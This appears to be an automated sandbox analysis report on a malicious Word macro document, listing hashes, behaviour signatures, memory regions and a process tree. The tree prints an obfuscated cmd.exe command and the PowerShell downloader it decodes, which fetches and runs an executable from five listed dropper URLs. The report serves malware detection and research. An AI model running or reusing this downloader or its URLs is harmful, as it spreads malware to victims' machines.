Analysis

  • max time kernel
    132s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2024 06:02

General

  • Target

    8d1c3a8567d4783dd0eeda20eab00b5b_JaffaCakes118.doc

  • Size

    69KB

  • MD5

    8d1c3a8567d4783dd0eeda20eab00b5b

  • SHA1

    9c993205778a28a8e71a0315c7c32ac46a36a405

  • SHA256

    158bd5360e8a314ea7eb641808de86cde3e55bae9829d5c8f2a7e7e44b791b81

  • SHA512

    05421d307d863a950715ea10ae40662d06d6d968b1c2f19c0a31a8d019f8e72a5c47e20750fbf53cf27c767febcc2df9bda024dc08fa146ddaaf9bb66eb5717a

  • SSDEEP

    768:QpJcaUitGAlmrJpmxlzC+w99NB7+1oALIH5E+4Iwsp/6Z1DpXC:QptJlmrJpmxlRw99NB7+aA9+3wspyzV

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://bioners.com/X8nV8i

exe.dropper

http://otiaki.com/33EKwRe

exe.dropper

http://bc-cdc.org/x

exe.dropper

http://marienthal.info/gIAl3AM

exe.dropper

http://jingtianyanglao.com/iaM5oV8

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8d1c3a8567d4783dd0eeda20eab00b5b_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V/C"^se^t J^dk=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{hc^t^ac^};k^aerb^;^h^tw$^ m^e^t^I-^ek^ovn^I^;)^htw^$ ,J^Hq^$(^el^iFda^oln^woD^.c^dw^$^{^yr^t^{)Cli$^ ni^ ^JH^q^$(hca^er^of;'exe^.^'^+N^Jw$+^'\'+cilb^up^:vne^$=h^tw^$^;^'^0^9^9^' =^ N^Jw^$;)'^@'(^til^p^S^.^'^8Vo^5Ma^i/m^oc.oa^lgn^ayn^a^itgn^ij//^:^p^t^th@^M^A3lAIg/ofni.^l^a^htneiram//:^ptth@^x/^gro.cdc^-cb//:p^tt^h^@eR^wKE^3^3/moc^.^ikait^o//^:ptth@^i8Vn8X/moc.^sren^oib//:ptt^h'^=Cl^i$^;^tn^e^ilC^be^W^.^teN^ ^tc^ej^b^o^-wen=c^dw$^ ^l^l^eh^sr^e^w^o^p&&for /L %^e ^in (^3^47^;^-^1^;^0)d^o s^e^t 8^T^B=!8^T^B!!J^dk:~%^e,1!&&i^f %^e ^l^e^q ^0 c^a^ll %8^T^B:^*^8^TB!^=%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $wdc=new-object Net.WebClient;$ilC='http://bioners.com/X8nV8i@http://otiaki.com/33EKwRe@http://bc-cdc.org/x@http://marienthal.info/gIAl3AM@http://jingtianyanglao.com/iaM5oV8'.Split('@');$wJN = '990';$wth=$env:public+'\'+$wJN+'.exe';foreach($qHJ in $ilC){try{$wdc.DownloadFile($qHJ, $wth);Invoke-Item $wth;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3752

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD90CF.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgfkbkj4.0i0.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\990.exe

    Filesize

    1KB

    MD5

    9d712bb18c59707f51e96012d0f669fc

    SHA1

    b2b69a0063cadf3791fc2ced2b1c948d437a196a

    SHA256

    dd64b1ebae3614e1c3880de3ca2fcf5890e9b81fc7eac0018fe3eec4baed1b73

    SHA512

    01f337f2c65f16cb694aee9a52cb54d54ed0c7e8fcaf08ccc9638d6661bbf7049eb51fd0c695016a4c7c96028860476026f9e65d3d4e021bc8572949690555a6

  • memory/1056-18-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-10-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-5-0x00007FFCD90ED000-0x00007FFCD90EE000-memory.dmp

    Filesize

    4KB

  • memory/1056-37-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-7-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-9-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-11-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-42-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-8-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-13-0x00007FFC96870000-0x00007FFC96880000-memory.dmp

    Filesize

    64KB

  • memory/1056-12-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-14-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-15-0x00007FFC96870000-0x00007FFC96880000-memory.dmp

    Filesize

    64KB

  • memory/1056-41-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-16-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-0-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-6-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-3-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-17-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-43-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-4-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-573-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-2-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-1-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-546-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-547-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-548-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-549-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp

    Filesize

    2.0MB

  • memory/1056-571-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-570-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-572-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/1056-569-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp

    Filesize

    64KB

  • memory/3752-53-0x000002388AE30000-0x000002388AE52000-memory.dmp

    Filesize

    136KB